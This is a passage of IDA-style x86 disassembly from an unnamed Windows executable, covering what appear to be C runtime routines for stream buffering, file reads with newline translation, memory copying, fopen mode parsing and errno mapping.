loc_4173D7: ; CODE XREF: sub_417159+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4173EA
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4173EA: ; CODE XREF: sub_417159+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_417400: ; CODE XREF: sub_417159+247�j
; sub_417159+27C�j
mov ecx, [ebp+var_8]
loc_417403: ; CODE XREF: sub_417159+1A3�j
test ecx, ecx
jz short loc_417412
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_41740F: ; CODE XREF: sub_417159+223�j
mov ecx, [ebp+var_8]
loc_417412: ; CODE XREF: sub_417159+2AC�j
; sub_417159+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_417448
cmp ebx, dword_47A620
jnz short loc_417448
mov ecx, [ebp+var_4]
cmp ecx, dword_47A638
jnz short loc_417448
and dword_47A620, 0
loc_417448: ; CODE XREF: sub_417159+2D3�j
; sub_417159+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_417450: ; CODE XREF: sub_417159+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_417159 endp
; =============== S U B R O U T I N E =======================================
sub_417455 proc near ; CODE XREF: sub_413055+AA�p
; sub_4142F5+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_417531
test al, 40h
jnz loc_417531
test al, 2
jz short loc_41747C
or eax, 20h
mov [esi+0Ch], eax
jmp loc_417531
; ---------------------------------------------------------------------------
loc_41747C: ; CODE XREF: sub_417455+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_417491
push esi
call sub_41AA0C
pop ecx
jmp short loc_417496
; ---------------------------------------------------------------------------
loc_417491: ; CODE XREF: sub_417455+31�j
mov eax, [esi+8]
mov [esi], eax
loc_417496: ; CODE XREF: sub_417455+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_417703
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_417520
cmp eax, 0FFFFFFFFh
jz short loc_417520
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_4174F5
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_4174DB
mov edi, ecx
sar edi, 5
mov edi, dword_47A2E0[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_4174E0
; ---------------------------------------------------------------------------
loc_4174DB: ; CODE XREF: sub_417455+6D�j
mov edi, offset dword_42D068
loc_4174E0: ; CODE XREF: sub_417455+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_4174F5
or edx, 2000h
mov [esi+0Ch], edx
loc_4174F5: ; CODE XREF: sub_417455+64�j
; sub_417455+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_417512
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_417512
test ch, 4
jnz short loc_417512
mov dword ptr [esi+18h], 1000h
loc_417512: ; CODE XREF: sub_417455+A7�j
; sub_417455+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417520: ; CODE XREF: sub_417455+57�j
; sub_417455+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_417531: ; CODE XREF: sub_417455+A�j
; sub_417455+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_417455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417536 proc near ; CODE XREF: sub_417703+52�p
; sub_41BFAD+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_4176FC
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:47A2E0h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_4176FC
test cl, 48h
jz short loc_41759C
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41759C
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41759C: ; CODE XREF: sub_417536+47�j
; sub_417536+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call ds:dword_41F058
test eax, eax
jnz short loc_4175EE
call ds:dword_41F008
push 5
pop esi
cmp eax, esi
jnz short loc_4175D6
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
mov [eax], esi
jmp short loc_4175E6
; ---------------------------------------------------------------------------
loc_4175D6: ; CODE XREF: sub_417536+8A�j
cmp eax, 6Dh
jz loc_4176FC
push eax
call sub_417C82
pop ecx
loc_4175E6: ; CODE XREF: sub_417536+9E�j
or eax, 0FFFFFFFFh
jmp loc_4176FE
; ---------------------------------------------------------------------------
loc_4175EE: ; CODE XREF: sub_417536+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_4176F7
test edx, edx
jz short loc_417611
cmp byte ptr [ebx], 0Ah
jnz short loc_417611
or al, 4
jmp short loc_417613
; ---------------------------------------------------------------------------
loc_417611: ; CODE XREF: sub_417536+D0�j
; sub_417536+D5�j
and al, 0FBh
loc_417613: ; CODE XREF: sub_417536+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_4176F1
loc_41762B: ; CODE XREF: sub_417536+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_4176E1
cmp al, 0Dh
jz short loc_417647
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_4176D3
; ---------------------------------------------------------------------------
loc_417647: ; CODE XREF: sub_417536+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_417661
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41765C
add [ebp+arg_8], 2
jmp short loc_4176B5
; ---------------------------------------------------------------------------
loc_41765C: ; CODE XREF: sub_417536+11E�j
mov [ebp+arg_8], eax
jmp short loc_4176CF
; ---------------------------------------------------------------------------
loc_417661: ; CODE XREF: sub_417536+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call ds:dword_41F058
test eax, eax
jnz short loc_417689
call ds:dword_41F008
test eax, eax
jnz short loc_4176CF
loc_417689: ; CODE XREF: sub_417536+147�j
cmp [ebp+var_C], 0
jz short loc_4176CF
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_4176AA
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_4176B5
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_4176D2
; ---------------------------------------------------------------------------
loc_4176AA: ; CODE XREF: sub_417536+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_4176BA
cmp [ebp+var_1], 0Ah
jnz short loc_4176BA
loc_4176B5: ; CODE XREF: sub_417536+124�j
; sub_417536+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_4176D2
; ---------------------------------------------------------------------------
loc_4176BA: ; CODE XREF: sub_417536+177�j
; sub_417536+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_419BC9
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_4176D3
loc_4176CF: ; CODE XREF: sub_417536+129�j
; sub_417536+151�j ...
mov byte ptr [ebx], 0Dh
loc_4176D2: ; CODE XREF: sub_417536+172�j
; sub_417536+182�j
inc ebx
loc_4176D3: ; CODE XREF: sub_417536+10C�j
; sub_417536+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41762B
jmp short loc_4176F1
; ---------------------------------------------------------------------------
loc_4176E1: ; CODE XREF: sub_417536+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_4176F1
or al, 2
mov [esi], al
loc_4176F1: ; CODE XREF: sub_417536+EF�j
; sub_417536+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_4176F7: ; CODE XREF: sub_417536+C8�j
mov eax, [ebp+var_8]
jmp short loc_4176FE
; ---------------------------------------------------------------------------
loc_4176FC: ; CODE XREF: sub_417536+16�j
; sub_417536+3E�j ...
xor eax, eax
loc_4176FE: ; CODE XREF: sub_417536+B3�j
; sub_417536+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_417536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417703 proc near ; CODE XREF: sub_413055+91�p
; sub_417455+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00417792 SIZE 0000001C BYTES
push 0Ch
push offset stru_427A40
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_417792
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417792
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417762
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_417536
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_417779
; ---------------------------------------------------------------------------
loc_417762: ; CODE XREF: sub_417703+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_417779: ; CODE XREF: sub_417703+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41778A
mov eax, [ebp+var_1C]
jmp short loc_4177A8
sub_417703 endp
; =============== S U B R O U T I N E =======================================
sub_417787 proc near ; DATA XREF: .rdata:stru_427A40�o
mov ebx, [ebp+8]
sub_417787 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41778A proc near ; CODE XREF: sub_417703+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_41778A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417703
loc_417792: ; CODE XREF: sub_417703+15�j
; sub_417703+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_4177A8: ; CODE XREF: sub_417703+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417703
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177B0 proc near ; CODE XREF: sub_413055+5F�p
; sub_41318A+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4177D0
cmp edi, eax
jb loc_41794C
loc_4177D0: ; CODE XREF: sub_4177B0+16�j
test edi, 3
jnz short loc_4177EC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
loc_4177EC: ; CODE XREF: sub_4177B0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_417804
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41780C+4[eax*4]
; ---------------------------------------------------------------------------
loc_417804: ; CODE XREF: sub_4177B0+46�j
jmp dword ptr ds:loc_41790C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41780C: ; CODE XREF: sub_4177B0+31�j
; sub_4177B0+8E�j ...
jmp ds:off_417890[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417820
dd offset loc_41784C
dd offset loc_417870
; ---------------------------------------------------------------------------
loc_417820: ; DATA XREF: sub_4177B0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41784C: ; DATA XREF: sub_4177B0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417870: ; DATA XREF: sub_4177B0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417890 dd offset loc_4178F3 ; DATA XREF: sub_4177B0:loc_41780C�r
dd offset loc_4178E0
dd offset loc_4178D8
dd offset loc_4178D0
dd offset loc_4178C8
dd offset loc_4178C0
dd offset loc_4178B8
dd offset loc_4178B0
; ---------------------------------------------------------------------------
loc_4178B0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4178B8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4178C0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4178C8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4178D0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4178D8: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4178E0: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4178F3: ; CODE XREF: sub_4177B0:loc_41780C�j
; DATA XREF: sub_4177B0:off_417890�o
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4178FC dd offset loc_41790C ; DATA XREF: sub_4177B0+35�r
; sub_4177B0+92�r ...
dd offset loc_417914
dd offset loc_417920
dd offset loc_417934
; ---------------------------------------------------------------------------
loc_41790C: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417914: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417920: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417934: ; CODE XREF: sub_4177B0+35�j
; sub_4177B0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41794C: ; CODE XREF: sub_4177B0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_417980
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_417974: ; CODE XREF: sub_4177B0+1B5�j
; sub_4177B0+210�j ...
neg ecx
jmp ds:off_417A48[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417980: ; CODE XREF: sub_4177B0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417998
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_417998+4[eax*4]
; ---------------------------------------------------------------------------
loc_417998: ; CODE XREF: sub_4177B0+1DA�j
; DATA XREF: sub_4177B0+1E1�r
jmp ds:off_417A98[ecx*4]
; ---------------------------------------------------------------------------
align 10h
lodsb
jns short loc_4179E4
add al, dl
jns short near ptr loc_4179E7+1
add al, bh
jns short loc_4179EC
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
loc_4179E4: ; CODE XREF: sub_4177B0+1F1�j
sub edi, 2
loc_4179E7: ; CODE XREF: sub_4177B0+1F5�j
cmp ecx, 8
jb short loc_417974
loc_4179EC: ; CODE XREF: sub_4177B0+1F9�j
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417974
std
rep movsd
cld
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417A4C
dd offset loc_417A54
dd offset loc_417A5C
dd offset loc_417A64
dd offset loc_417A6C
dd offset loc_417A74
dd offset loc_417A7C
off_417A48 dd offset loc_417A8F ; DATA XREF: sub_4177B0+1C6�r
; ---------------------------------------------------------------------------
loc_417A4C: ; DATA XREF: sub_4177B0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_417A54: ; DATA XREF: sub_4177B0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417A5C: ; DATA XREF: sub_4177B0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_417A64: ; DATA XREF: sub_4177B0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417A6C: ; DATA XREF: sub_4177B0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_417A74: ; DATA XREF: sub_4177B0+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417A7C: ; DATA XREF: sub_4177B0+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417A8F: ; CODE XREF: sub_4177B0+1C6�j
; DATA XREF: sub_4177B0:off_417A48�o
jmp ds:off_417A98[edx*4]
; ---------------------------------------------------------------------------
align 4
off_417A98 dd offset loc_417AA8 ; DATA XREF: sub_4177B0+1BB�r
; sub_4177B0:loc_417998�r ...
dd offset loc_417AB0
dd offset loc_417AC0
dd offset loc_417AD4
; ---------------------------------------------------------------------------
loc_417AA8: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417AB0: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417AC0: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417AD4: ; CODE XREF: sub_4177B0+1BB�j
; sub_4177B0:loc_417998�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4177B0 endp
; =============== S U B R O U T I N E =======================================
sub_417AED proc near ; CODE XREF: sub_41318A+150�p
; sub_41318A+19B�p ...
arg_0 = dword ptr 4
mov eax, dword_47A010
test eax, eax
jz short loc_417B05
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_417B05
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417B05: ; CODE XREF: sub_417AED+7�j
; sub_417AED+12�j
xor eax, eax
retn
sub_417AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B08 proc near ; CODE XREF: sub_413337+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_47A1B8
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_417B41
cmp al, 72h
jz short loc_417B3A
cmp al, 77h
jnz loc_417C4D
mov ecx, 301h
jmp short loc_417B46
; ---------------------------------------------------------------------------
loc_417B3A: ; CODE XREF: sub_417B08+21�j
xor ecx, ecx
or esi, 1
jmp short loc_417B49
; ---------------------------------------------------------------------------
loc_417B41: ; CODE XREF: sub_417B08+1D�j
mov ecx, 109h
loc_417B46: ; CODE XREF: sub_417B08+30�j
or esi, 2
loc_417B49: ; CODE XREF: sub_417B08+37�j
xor edx, edx
inc edx
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417B51: ; CODE XREF: sub_417B08+125�j
cmp edx, ebx
jz loc_417C33
movsx eax, al
cmp eax, 54h
jg short loc_417BD2
jz short loc_417BC5
sub eax, 2Bh
jz short loc_417BAF
sub eax, 19h
jz short loc_417BA5
sub eax, 0Eh
jz short loc_417B91
dec eax
jnz loc_417C0A
cmp [ebp+var_4], ebx
jnz loc_417C0A
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417B91: ; CODE XREF: sub_417B08+68�j
cmp [ebp+var_4], ebx
jnz short loc_417C0A
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_417C28
; ---------------------------------------------------------------------------
loc_417BA5: ; CODE XREF: sub_417B08+63�j
test cl, 40h
jnz short loc_417C0A
or ecx, 40h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BAF: ; CODE XREF: sub_417B08+5E�j
test cl, 2
jnz short loc_417C0A
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BC5: ; CODE XREF: sub_417B08+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_417C0A
or ecx, eax
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BD2: ; CODE XREF: sub_417B08+57�j
sub eax, 62h
jz short loc_417C1D
dec eax
jz short loc_417C05
sub eax, 0Bh
jz short loc_417BF1
sub eax, 6
jnz short loc_417C0A
test ch, 0C0h
jnz short loc_417C0A
or ecx, 4000h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417BF1: ; CODE XREF: sub_417B08+D5�j
cmp [ebp+var_8], ebx
jnz short loc_417C0A
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C05: ; CODE XREF: sub_417B08+D0�j
cmp [ebp+var_8], ebx
jz short loc_417C0E
loc_417C0A: ; CODE XREF: sub_417B08+6B�j
; sub_417B08+74�j ...
xor edx, edx
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C0E: ; CODE XREF: sub_417B08+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_417C28
; ---------------------------------------------------------------------------
loc_417C1D: ; CODE XREF: sub_417B08+CD�j
test ch, 0C0h
jnz short loc_417C0A
or ecx, 8000h
loc_417C28: ; CODE XREF: sub_417B08+44�j
; sub_417B08+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_417B51
loc_417C33: ; CODE XREF: sub_417B08+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41C294
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_417C51
loc_417C4D: ; CODE XREF: sub_417B08+25�j
xor eax, eax
jmp short loc_417C6B
; ---------------------------------------------------------------------------
loc_417C51: ; CODE XREF: sub_417B08+143�j
mov eax, [ebp+arg_C]
inc dword_479EB8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_417C6B: ; CODE XREF: sub_417B08+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_417B08 endp
; =============== S U B R O U T I N E =======================================
sub_417C70 proc near ; CODE XREF: sub_413337+18�p
; sub_4134AF+2B�p ...
call sub_415456
add eax, 8
retn
sub_417C70 endp
; =============== S U B R O U T I N E =======================================
sub_417C79 proc near ; CODE XREF: sub_4134AF+36�p
; sub_416387+8A�p ...
call sub_415456
add eax, 0Ch
retn
sub_417C79 endp
; =============== S U B R O U T I N E =======================================
sub_417C82 proc near ; CODE XREF: sub_4134AF+16�p
; sub_414125+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_415456
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_417C91: ; CODE XREF: sub_417C82+1C�j
cmp ecx, dword_42CCB0[esi*8]
jz short loc_417CB8
inc esi
cmp esi, 2Dh
jb short loc_417C91
cmp ecx, 13h
jb short loc_417CC9
cmp ecx, 24h
ja short loc_417CC9
call sub_415456
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CB8: ; CODE XREF: sub_417C82+16�j
call sub_415456
mov ecx, dword_42CCB4[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CC9: ; CODE XREF: sub_417C82+21�j
; sub_417C82+26�j
cmp ecx, 0BCh
jb short loc_417CE7
cmp ecx, 0CAh
ja short loc_417CE7
call sub_415456
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_417CE7: ; CODE XREF: sub_417C82+4D�j
; sub_417C82+55�j
call sub_415456
mov dword ptr [eax+8], 16h
pop esi
retn
sub_417C82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CF5 proc near ; CODE XREF: sub_413337+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_427A50
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_417D15: ; CODE XREF: sub_417CF5+85�j
mov [ebp+var_20], esi
cmp esi, dword_47B660
jge loc_417DE4
mov eax, dword_47A644
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_417D80
test byte ptr [eax+0Ch], 83h
jnz short loc_417D79
cmp esi, 2
jle short loc_417D52
cmp esi, 14h
jge short loc_417D52
lea eax, [esi+10h]
push eax
call sub_416882
pop ecx
test eax, eax
jz loc_417DE4
loc_417D52: ; CODE XREF: sub_417CF5+44�j
; sub_417CF5+49�j
mov eax, dword_47A644
push dword ptr [eax+esi*4]
push esi
call sub_4166A2
pop ecx
pop ecx
mov eax, dword_47A644
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_417D7C
push eax
push esi
call sub_4166F4
pop ecx
pop ecx
